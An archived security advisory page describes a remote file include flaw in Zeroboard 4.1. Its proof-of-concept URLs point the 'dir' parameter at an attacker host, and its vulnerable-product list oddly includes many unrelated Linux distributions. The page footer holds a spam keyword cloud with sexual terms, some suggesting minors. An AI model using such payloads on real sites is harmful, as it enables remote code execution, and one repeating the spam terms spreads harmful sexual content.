about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Zeroboard DIR Parameter Remote File Include Vulnerabilities


Title Zeroboard DIR Parameter Remote File Include Vulnerabilities
Published 2005-01-10-12:00AM
Updated 2005-01-13-11:02PM
Class Input Validation Error
CVE   CAN-2005-0380
Remote  Yes
Local  No
Credit  Discovery is credited to Optik4Lab.
Vulnerable  Zeroboard Zeroboard 4.1 pl5
Zeroboard Zeroboard 4.1 pl4
Zeroboard Zeroboard 4.1 pl3
Zeroboard Zeroboard 4.1 pl2
Debian Linux 2.2 68k
Debian Linux 2.2 alpha
Debian Linux 2.2 arm
Debian Linux 2.2 IA32
Debian Linux 2.2 powerpc
Debian Linux 2.2 sparc
MandrakeSoft Linux Mandrake 8.0
MandrakeSoft Linux Mandrake 8.0 ppc
MandrakeSoft Linux Mandrake 8.1
MandrakeSoft Linux Mandrake 8.1 ia64
MandrakeSoft Linux Mandrake 8.2
RedHat Linux 6.2 alpha
RedHat Linux 6.2 i386
RedHat Linux 6.2 sparc
RedHat Linux 7.0 alpha
RedHat Linux 7.0 i386
RedHat Linux 7.0 sparc
RedHat Linux 7.1 alpha
RedHat Linux 7.1 i386
RedHat Linux 7.1 ia64
RedHat Linux 7.2 i386
RedHat Linux 7.2 ia64
RedHat Linux 7.3 i386
S.u.S.E. Linux 6.4 alpha
S.u.S.E. Linux 6.4 i386
S.u.S.E. Linux 6.4 ppc
S.u.S.E. Linux 7.0 alpha
S.u.S.E. Linux 7.0 i386
S.u.S.E. Linux 7.0 ppc
S.u.S.E. Linux 7.0 sparc
S.u.S.E. Linux 7.1 alpha
S.u.S.E. Linux 7.1 ppc
S.u.S.E. Linux 7.1 sparc
S.u.S.E. Linux 7.1 x86
S.u.S.E. Linux 7.2 i386
S.u.S.E. Linux 7.3 i386
S.u.S.E. Linux 7.3 ppc
S.u.S.E. Linux 7.3 sparc
S.u.S.E. Linux 8.0 i386
Not Vulnerable  
Code   An exploit is not required.

The following proof of concept examples are available:
http://www.example.com/skin/zero_vote/error.php?dir=http://[ATTACKER]
http://www.example.com/skin/zero_vote/login.php?dir=http://[attacker]/
http://www.example.com/skin/zero_vote/setup.php?dir=http://[attacker]/
http://www.example.com/skin/zero_vote/ask_password.php?dir=http://[attacker]/
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Thu, 17 Dec 2009 02:03:01 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
FOTO&a a...oolbar vBulletin www.fuda19 Www.700.Se yacouwang. www.Tamils Grils sex maxcpm.inf http:/www. www.gerlet hindi lang pussyslot Www.FreeXx bbs.ltdts. news for c Preteen gi 2.6.9-34.0 Sooper.Jen Www.FreeXx www.tyshq. Postfix ES Sexgirls.C Www.FreeXx news for c Www.FreeXx Www.FreeXx Www.700.Se Local xp www.wendis rpc backdo http:/host Www.FreeXx SMT community www.acheng www.wendis wwwantys FILME SEXY MY JUGNI N www.xjsf16 preteen bo ems galler www .sexoc www.lelemo blue movie Multiple S Wap.waptri sexey Hello, wel